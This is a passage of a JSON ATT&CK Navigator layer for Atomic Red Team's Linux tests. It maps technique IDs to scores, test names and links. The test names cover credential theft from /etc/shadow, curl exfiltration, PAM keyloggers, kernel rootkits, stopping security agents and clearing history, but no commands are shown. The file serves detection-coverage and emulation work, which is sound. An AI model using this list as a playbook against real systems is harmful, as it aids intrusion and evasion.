Stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1564","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":1,"enabled":true,"comment":"\n- Create a hidden file in a hidden directory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1569","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":1,"enabled":true,"comment":"\n- psexec.py (Impacket)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1574","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.006","score":2,"enabled":true,"comment":"\n- Shared Library Injection via /etc/ld.so.preload\n- Shared Library Injection via LD_PRELOAD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1614","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":4,"enabled":true,"comment":"\n- Discover System Language with locale\n- Discover System Language with localectl\n- Discover System Language by locale file\n- Discover System Language by Environment Variable Query\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]}]} \ No newline at end of file +{"name":"Atomic Red Team (Linux)","versions":{"attack":"12","navigator":"4.7.1","layer":"4.4"},"description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Linux"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}]},{"techniqueID":"T1003.007","score":3,"enabled":true,"comment":"\n- Dump individual process memory with sh (Local)\n- Dump individual process memory with Python (Local)\n- Capture Passwords with MimiPenguin\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.007/T1003.007.md"}]},{"techniqueID":"T1003.008","score":4,"enabled":true,"comment":"\n- Access /etc/shadow (Local)\n- Access /etc/passwd (Local)\n- Access /etc/{shadow,passwd} with a standard bin that's not cat\n- Access /etc/{shadow,passwd} with shell builtins\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md"}]},{"techniqueID":"T1007","score":1,"enabled":true,"comment":"\n- System Service Discovery - systemctl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1014","score":4,"enabled":true,"comment":"\n- Loadable Kernel Module based Rootkit\n- Loadable Kernel Module based Rootkit\n- dynamic-linker based rootkit (libprocesshider)\n- Loadable Kernel Module based Rootkit (Diamorphine)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1014/T1014.md"}]},{"techniqueID":"T1016","score":1,"enabled":true,"comment":"\n- System Network Configuration Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":5,"enabled":true,"comment":"\n- Remote System Discovery - arp nix\n- Remote System Discovery - sweep\n- Remote System Discovery - ip neighbour\n- Remote System Discovery - ip route\n- Remote System Discovery - ip tcp_metrics\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1027","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Decode base64 Data into Script\n"},{"techniqueID":"T1027.001","score":1,"enabled":true,"comment":"\n- Pad Binary to Change Hash - Linux/macOS dd\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.001/T1027.001.md"}]},{"techniqueID":"T1027.002","score":2,"enabled":true,"comment":"\n- Binary simply packed by UPX (linux)\n- Binary packed by UPX, with modified headers (linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.002/T1027.002.md"}]},{"techniqueID":"T1027.004","score":3,"enabled":true,"comment":"\n- C compile\n- CC compile\n- Go compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1030","score":1,"enabled":true,"comment":"\n- Data Transfer Size Limits\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1030/T1030.md"}]},{"techniqueID":"T1033","score":1,"enabled":true,"comment":"\n- System Owner/User Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}]},{"techniqueID":"T1036.003","score":1,"enabled":true,"comment":"\n- Masquerading as Linux crond process.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Execute a process from a directory masquerading as the current parent directory.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1036.006","score":1,"enabled":true,"comment":"\n- Space After Filename\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.006/T1036.006.md"}]},{"techniqueID":"T1037","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.004","score":2,"enabled":true,"comment":"\n- rc.common\n- rc.local\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.004/T1037.004.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Linux using tshark or tcpdump\n- Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo\n- Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo\n- Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo\n- Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1046","score":2,"enabled":true,"comment":"\n- Port Scan\n- Port Scan Nmap\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1048","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- Exfiltration Over Alternative Protocol - SSH\n- Exfiltration Over Alternative Protocol - SSH\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":3,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - DNS\n- Python3 http.server\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":1,"enabled":true,"comment":"\n- System Network Connections Discovery Linux & MacOS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At - Schedule a job\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.003","score":3,"enabled":true,"comment":"\n- Cron - Replace crontab with referenced file\n- Cron - Add script to all cron subfolders\n- Cron - Add script to /var/spool/cron/crontabs/ folder\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md"}]},{"techniqueID":"T1053.006","score":3,"enabled":true,"comment":"\n- Create Systemd Service and Timer\n- Create a user level transient systemd service and timer\n- Create a system level transient systemd service and timer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.006/T1053.006.md"}]},{"techniqueID":"T1056","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":5,"enabled":true,"comment":"\n- Living off the land Terminal Input Capture on Linux with pam.d\n- Logging bash history to syslog\n- Bash session based keylogger\n- SSHD PAM keylogger\n- Auditd keylogger\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1057","score":1,"enabled":true,"comment":"\n- Process Discovery - ps\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":15,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.004","score":11,"enabled":true,"comment":"\n- Create and Execute Bash Shell Script\n- Command-Line Interface\n- Harvest SUID executable files\n- LinEnum tool execution\n- New script file in the tmp directory\n- What shell is running\n- What shells are available\n- Command line scripts\n- Obfuscated command line scripts\n- Change login shell\n- Environment variable scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.004/T1059.004.md"}]},{"techniqueID":"T1059.006","score":4,"enabled":true,"comment":"\n- Execute shell script via python's command mode arguement\n- Execute Python via scripts (Linux)\n- Execute Python via Python executables (Linux)\n- Python pty module and spawn function used to spawn sh or bash\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.006/T1059.006.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery (Local)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1070","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}]},{"techniqueID":"T1070.002","score":3,"enabled":true,"comment":"\n- rm -rf\n- Overwrite Linux Mail Spool\n- Overwrite Linux Log\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.002/T1070.002.md"}]},{"techniqueID":"T1070.003","score":9,"enabled":true,"comment":"\n- Clear Bash history (rm)\n- Clear Bash history (echo)\n- Clear Bash history (cat dev/null)\n- Clear Bash history (ln dev/null)\n- Clear Bash history (truncate)\n- Clear history of a bunch of shells\n- Clear and Disable Bash History Logging\n- Use Space Before Command to Avoid Logging to History\n- Disable Bash History Logging with SSH -T\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":4,"enabled":true,"comment":"\n- Delete a single file - Linux/macOS\n- Delete an entire folder - Linux/macOS\n- Overwrite and delete a file with shred\n- Delete Filesystem - Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Set a file's access timestamp\n- Set a file's modification timestamp\n- Set a file's creation timestamp\n- Modify file timestamps using reference file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1071","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":1,"enabled":true,"comment":"\n- Malicious User Agents - Nix\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1074","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":1,"enabled":true,"comment":"\n- Stage data from Discovery.sh\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1082","score":6,"enabled":true,"comment":"\n- List OS Information\n- Linux VM Check via Hardware\n- Linux VM Check via Kernel Modules\n- Hostname Discovery\n- Environment variables discovery on macos and linux\n- Linux List Kernel Modules\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":2,"enabled":true,"comment":"\n- Nix File and Directory Discovery\n- Nix File and Directory Discovery 2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":6,"enabled":true,"comment":"\n- Enumerate all accounts (Local)\n- View sudoers access\n- View accounts with UID 0\n- List opened files by user\n- Show if a user account has ever logged in remotely\n- Enumerate users and groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"}]},{"techniqueID":"T1090","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090/T1090.md"}]},{"techniqueID":"T1090.001","score":1,"enabled":true,"comment":"\n- Connection Proxy\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"}]},{"techniqueID":"T1090.003","score":1,"enabled":true,"comment":"\n- Tor Proxy Usage - Debian/Ubuntu\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.003/T1090.003.md"}]},{"techniqueID":"T1098","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}]},{"techniqueID":"T1098.004","score":1,"enabled":true,"comment":"\n- Modify SSH Authorized Keys\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.004/T1098.004.md"}]},{"techniqueID":"T1105","score":8,"enabled":true,"comment":"\n- rsync remote file copy (push)\n- rsync remote file copy (pull)\n- scp remote file copy (push)\n- scp remote file copy (pull)\n- sftp remote file copy (push)\n- sftp remote file copy (pull)\n- whois file download\n- Linux Download File and Run\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":2,"enabled":true,"comment":"\n- SUDO Brute Force - Debian\n- SUDO Brute Force - Redhat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- SSH Credential Stuffing From Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- X Windows Capture\n- Capture Linux Desktop using Import Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1115","score":1,"enabled":true,"comment":"\n- Add or copy content to clipboard with xClip\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- Base64 Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1135","score":1,"enabled":true,"comment":"\n- Network Share Discovery - linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":2,"enabled":true,"comment":"\n- Create a user account on a Linux system\n- Create a new user in Linux with `root` UID and GID.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1140","score":5,"enabled":true,"comment":"\n- Base64 decoding with Python\n- Base64 decoding with Perl\n- Base64 decoding with shell utilities\n- Hex decoding with shell utilities\n- Linux Base64 Encoded Shebang in CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":3,"enabled":true,"comment":"\n- Chrome (Developer Mode)\n- Chrome (Chrome Web Store)\n- Firefox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1201","score":4,"enabled":true,"comment":"\n- Examine password complexity policy - Ubuntu\n- Examine password complexity policy - CentOS/RHEL 7.x\n- Examine password complexity policy - CentOS/RHEL 6.x\n- Examine password expiration policy - All Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1217","score":1,"enabled":true,"comment":"\n- List Mozilla Firefox Bookmark Database Files on Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1222","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.002","score":11,"enabled":true,"comment":"\n- chmod - Change file or folder mode (numeric mode)\n- chmod - Change file or folder mode (symbolic mode)\n- chmod - Change file or folder mode (numeric mode) recursively\n- chmod - Change file or folder mode (symbolic mode) recursively\n- chown - Change file or folder ownership and group\n- chown - Change file or folder ownership and group recursively\n- chown - Change file or folder mode ownership only\n- chown - Change file or folder ownership recursively\n- chattr - Remove immutable file attribute\n- Chmod through c script\n- Chown through c script\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1485","score":1,"enabled":true,"comment":"\n- macOS/Linux - Overwrite file with DD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":4,"enabled":true,"comment":"\n- Encrypt files using gpg (Linux)\n- Encrypt files using 7z (Linux)\n- Encrypt files using ccrypt (Linux)\n- Encrypt files using openssl (Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"comment":"\n- macOS/Linux - Simulate CPU Load with Yes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":1,"enabled":true,"comment":"\n- Detect Virtualization Environment (Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1518","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":1,"enabled":true,"comment":"\n- Security Software Discovery - ps (Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1529","score":7,"enabled":true,"comment":"\n- Restart System via `shutdown` - macOS/Linux\n- Shutdown System via `shutdown` - macOS/Linux\n- Restart System via `reboot` - macOS/Linux\n- Shutdown System via `halt` - Linux\n- Reboot System via `halt` - Linux\n- Shutdown System via `poweroff` - Linux\n- Reboot System via `poweroff` - Linux\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1543","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.002","score":2,"enabled":true,"comment":"\n- Create Systemd Service\n- Create Systemd Service file, Enable the service , Modify and Reload the service.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1546","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.004","score":5,"enabled":true,"comment":"\n- Add command to .bash_profile\n- Add command to .bashrc\n- Append to the system shell profile\n- Append commands user shell profile\n- System shell profile scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":2,"enabled":true,"comment":"\n- Trap EXIT\n- Trap SIGINT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1547","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.006","score":1,"enabled":true,"comment":"\n- Linux - Load Kernel Module via insmod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1548","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":7,"enabled":true,"comment":"\n- Make and modify binary from C source\n- Set a SetUID flag on file\n- Set a SetGID flag on file\n- Make and modify capabilities of a binary\n- Provide the SetUID capability to a file\n- Do reconnaissance for files that have the setuid bit set\n- Do reconnaissance for files that have the setgid bit set\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.003","score":3,"enabled":true,"comment":"\n- Sudo usage\n- Unlimited sudo cache timeout\n- Disable tty_tickets for sudo caching\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1552","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}],"comment":"\n- AWS - Retrieve EC2 Password Data using stratus\n"},{"techniqueID":"T1552.001","score":2,"enabled":true,"comment":"\n- Extract passwords with grep\n- Find and Access Github Credentials\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.003","score":1,"enabled":true,"comment":"\n- Search Through Bash History\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":4,"enabled":true,"comment":"\n- Discover Private SSH Keys\n- Copy Private SSH Keys with CP\n- Copy Private SSH Keys with rsync\n- Copy the users GnuPG directory with rsync\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.007","score":1,"enabled":true,"comment":"\n- Cat the contents of a Kubernetes service account token file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.004","score":2,"enabled":true,"comment":"\n- Install root CA on CentOS/RHEL\n- Install root CA on Debian/Ubuntu\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1555","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.003","score":1,"enabled":true,"comment":"\n- LaZagne.py - Dump Credentials from Firefox Browser\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1556","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.003","score":2,"enabled":true,"comment":"\n- Malicious PAM rule\n- Malicious PAM module\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1560","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":4,"enabled":true,"comment":"\n- Data Compressed - nix - zip\n- Data Compressed - nix - gzip Single File\n- Data Compressed - nix - tar Folder or File\n- Data Encrypted with zip and gpg symmetric\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"comment":"\n- Compressing data using GZip in Python (Linux)\n- Compressing data using bz2 in Python (Linux)\n- Compressing data using zipfile in Python (Linux)\n- Compressing data using tarfile in Python (Linux)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":9,"enabled":true,"comment":"\n- Disable syslog\n- Disable Cb Response\n- Disable SELinux\n- Stop Crowdstrike Falcon on Linux\n- Clear History\n- Suspend History\n- Reboot Linux Host via Kernel System Request\n- Clear Pagging Cache\n- Disable Memory Swap\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.003","score":2,"enabled":true,"comment":"\n- Disable history collection\n- Mac HISTCONTROL\n","links":[{"label":"View 